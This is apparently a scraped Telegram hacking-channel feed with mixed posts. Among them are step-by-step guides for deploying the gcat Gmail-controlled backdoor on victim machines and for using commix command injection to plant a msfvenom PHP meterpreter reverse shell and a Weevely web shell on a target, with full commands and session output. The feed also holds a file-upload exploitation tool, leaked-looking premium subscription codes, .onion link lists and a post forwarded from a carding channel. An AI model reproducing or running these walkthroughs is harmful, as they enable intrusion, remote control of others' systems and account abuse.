UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.2K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ TIDAL PREMIUM Verified βœ…
pinterest.com/Undercode_Testing

@undercodeTesting Code = MMXV7ESYGC | Expiration = 2020-05-12
@undercodeTesting Code = 7AQGZ4XMUA | Expiration = 2020-05-12
@undercodeTesting Code = B6JXZVNG9R | Expiration = 2020-05-12
@undercodeTesting Code = TLSJCBGHWV | Expiration = 2020-05-12
@undercodeTesting Code = LDHYJEV8H2 | Expiration = 2020-05-12
@undercodeTesting Code = NWNFYXJXZ2 | Expiration = 2020-05-12
@undercodeTesting Code = 4W46G8VVQV | Expiration = 2020-05-12
@undercodeTesting Code = PAN2CSP3WP | Expiration = 2020-05-12
@undercodeTesting Code = A9FPMBY3V3 | Expiration = 2020-05-12
@undercodeTesting Code = ABYNU8PXKQ | Expiration = 2020-05-12
@undercodeTesting Code = BPK6JFTUSS | Expiration = 2020-05-12
@undercodeTesting Code = E5L4ZQ3RRG | Expiration = 2020-05-12
@undercodeTesting Code = 4DMPWCEFPZ | Expiration = 2020-05-12
@undercodeTesting Code = TL6UNHYNQB | Expiration = 2020-05-12
@undercodeTesting Code = FTPGVNKAWG | Expiration = 2020-05-12
@undercodeTesting Code = XSGSVTC8KT | Expiration = 2020-05-12
@undercodeTesting Code = P4LLF5N5YS | Expiration = 2020-05-12
@undercodeTesting Code = YG2AHB8KRH | Expiration = 2020-05-12
@undercodeTesting Code = E8DRRZ6LJ6 | Expiration = 2020-05-12
@undercodeTesting Code = C5AFA6M9FL | Expiration = 2020-05-12
@undercodeTesting Code = 55K6C4QF65 | Expiration = 2020-05-12
@undercodeTesting Code = KF2JYNCYP8 | Expiration = 2020-05-12
@undercodeTesting Code = USFJ8L3WW9 | Expiration = 2020-05-12
@undercodeTesting Code = B8HCCKNZXT | Expiration = 2020-05-12
@undercodeTesting Code = YPVS2UWEZC | Expiration = 2020-05-12
@undercodeTesting Code = QZ8LNY6JGD | Expiration = 2020-05-12
@undercodeTesting Code = 8MBTUYFN9A | Expiration = 2020-05-12
@undercodeTesting Code = ZJZPPVZ4MP | Expiration = 2020-05-12
@undercodeTesting Code = SYSF9F55JC | Expiration = 2020-05-12
@undercodeTesting Code = PM5ZJVAGR2 | Expiration = 2020-05-12
@undercodeTesting Code = 3LZ8S3MVCW | Expiration = 2020-05-12
@undercodeTesting Code = NGTWUB5FPU | Expiration = 2020-05-12
@undercodeTesting Code = QB4DKPZKPE | Expiration = 2020-05-12
@undercodeTesting Code = H49Z7GP79J | Expiration = 2020-05-12
@undercodeTesting Code = 4K3CPYRTE7 | Expiration = 2020-05-12
@undercodeTesting Code = 7XAAFVJ7QV | Expiration = 2020-05-12

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 updated Linux installer for termux
t.me/UndercodeTesting

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1)open termux and type

> echo "deb [trusted=yes arch=all] https://yadominjinta.github.io/files/ termux extras" >> $PREFIX/etc/apt/sources.list
pkg in atilo

> https://github.com/YadominJinta/atilo

2)
Atilo is a program to help you install some GNU/Linux distributions on Termux.

Commands:
images list available images
remove remove installed images
pull pulling an image
run run an image
clean clean tmps
help show this help.

πŸ¦‘ OS :
Distribution aarch64 arm x86_64 i686
Arch √ √ Γ— Γ—
Alpine √ √ √ √
CentOS √ Γ— √ Γ—
Debian √ √ √ √
Fedora √ Γ— √ Γ—
Kali √ √ √ √
openSUSE √ √ Γ— Γ—
Ubuntu √ √ √ √
Ubuntu LTS √ √ √ √

βœ… Verified


▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘tOP WEBSITEs FOR Earn Bitcoin- Cryptocurrency
T.me/UndercodeTesting

https://minergate.com/

https://www.bitcoinget.com/

https://coinbucks.io/

bitcoin.com also free btc

http://cointiply.com/r/LBVeJ

https://octoin.com/6182045928OCC

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘A PoC backdoor that uses Gmail as a C&C server

> A Gmail account (Use a dedicated account! Do not use your personal one!)

> Turn on "Allow less secure apps" under the security settings of the account

> You may also have to enable IMAP in the account settings

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/byt3bl33d3r/gcat

2) cd gcat

3) run as python implant.py

πŸ¦‘ Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:

#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
The output is a UUID string that uniquely identifies the system and the

> OS the implant is running on

Let's issue a command to an implant:
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
Here we are telling 90b2cd83-cb36-52de-84ee-99db6ff41a11 to execute ipconfig /all, the script then outputs the jobid that we can use to retrieve the output of that command

> Lets get the results!
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'


πŸ¦‘ Windows IP Configuration

Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 new update Automated All-in-One OS command injection and exploitation tool- for any linux os
t.me/undercodeTesting

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/commixproject/commix.git

2) cd commix

3) run python setup.py

πŸ¦‘ Create the PHP meterpreter shell (via msfvenom)

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.178.3 LPORT=4444 -e php/base64 -f raw > /root/Desktop/msfvenom.php

Note: Don't forget to add <?php and ?> in to msfvenom.php file

Step 2: Start the handler (via msfconsole)

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.178.3
LHOST => 192.168.178.3
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.178.3:4444
[*] Starting the payload handler...

Step 3: Use commix to create "msfvenom.php" file on target's "/var/www/" directory and execute it.

root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/msfvenom.php" --file-dest="/var/www/msfvenom.php" --os-cmd="php -f /var/www/msfvenom.php"

Step 4: Enjoy your shell!

[*] Sending stage (40499 bytes) to 192.168.178.4
[*] Meterpreter session 1 opened (192.168.178.3:4444 -> 192.168.178.4:50450) at 2015-05-16 03:11:42 -0400

meterpreter > sysinfo
Computer : debian
OS : Linux debian 3.16.0-4-586 #1 Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) i686
Meterpreter : php/php
meterpreter >
2. Upload a Weevely PHP web shell on target host.
Step 1 : Create the PHP web shell.

weevely generate commix
[generate.php] Backdoor file 'weevely.php' created with password 'commix'
Step 2 : Use commix to create "weevely.php" file on target's "var/www/html/cmd/" directory.

root@kali:~/commix# python commix.py --url="http://192.168.178.4/cmd/normal.php?addr=INJECT_HERE" --file-write="/root/Desktop/weevely.php" --file-dest="/var/www/html/cmd/"

Step 3 : Enjoy your shell!

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘New 2020 deepweb .onion for > Blogs


http://74ypjqjwf6oejmax.onion/ – Beneath VT – Exploring Virginia Tech’s Steam Tunnels and Beyond
http://76qugh5bey5gum7l.onion/ – Deep Web Radio
http://edramalpl7oq5npk.onion/Main_Page – Encyclopedia Dramatica
http://ih4pgsz3aepacbwl.onion/ – Hushbox
http://ad52wtwp2goynr3a.onion/# – Dark Like My Soul
http://tns7i5gucaaussz4.onion/ – FreeFor
http://gdkez5whqhpthb4d.onion/ – Scientology Archive
http://newsiiwanaduqpre.onion/ – All the latest news for tor
http://5vppavyzjkfs45r4.onion/ – Michael Blizek
http://7ueo7ahq2xlpwx7q.onion/ – AYPSELA News
http://7hk64iz2vn2ewi7h.onion/ – Blog about Stories
http://tigas3l7uusztiqu.onion/ – Mike Tigas
http://mpf3i4k43xc2usxj.onion/ – Sam Whited
http://7w2rtz7rgfwj5zuv.onion/ – An Open Letter to Revolutionaries
http://3c3bdbvhb7j6yab2.onion/ – Totse 2
http://4fvfamdpoulu2nms.onion/ – Lucky Eddie’s Home
http://nwycvryrozllb42g.onion/searchlores/index.htm – Fravia’s Web Searching Lore
http://newsiiwanaduqpre.onion/ – OnionNews – Blog about the onionland

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‘2020 deepweb forums via the Anonet Webproxy 7/24 online


http://sbforumaz7v3v6my.onion/ – SciBay Forums

http://kpmp444tubeirwan.onion/ – DeepWeb

http://r5c2ch4h5rogigqi.onion/ – StaTorsNet

http://hbjw7wjeoltskhol.onion – The BEST tor social network! File sharing,
messaging and much more. Use a fake email to register.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from TARJETAS PRO UNDER CARDING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘File upload vulnerability scanner and exploitation tool.
termux-linux

> Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.
t.me/UndercodeTesting

πŸ¦‘ π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/almandin/fuxploider.git

2) cd fuxploider

3) pip3 install -r requirements.txt

πŸ¦‘ For Docker installation

# Build the docker image
docker build -t almandin/fuxploider

4)example run :

> python3 fuxploider.py --url https://awesomeFileUploadService.com --not-regex "wrong file type"


@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BEST WORDPRESS 2020 PLUGINS
twitter.com/undercodeNews

1) WPForms integrates with all popular marketing and payment platforms, so you can build powerful forms in less than 5 minutes.
https://wpforms.com/

2)MonsterInsights is the best Google Analytics plugin for WordPress. It allows you to β€œproperly” connect your website with Google Analytics, so you can see exactly how people find and use your website.

https://www.monsterinsights.com/

3) Yoast SEO is one of the most popular WordPress plugin of all time. Out of all the WordPress SEO plugins, Yoast offers the most comprehensive solution with all the features and tools that you need to improve your on-page SEO.
https://wordpress.org/plugins/wordpress-seo/

4) Email is the most effective and most reliable marketing tool at your disposal as a business owner. It allows you to stay in touch with your users even after they leave your website. This is why we recommend every business owner to start building an email list right away.

https://www.constantcontact.com/global/home-page

5) OptinMonster is the most popular conversion rate optimization software in the market. It allows you to convert abandoning website visitors into email subscribers and customers.

https://optinmonster.com/

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM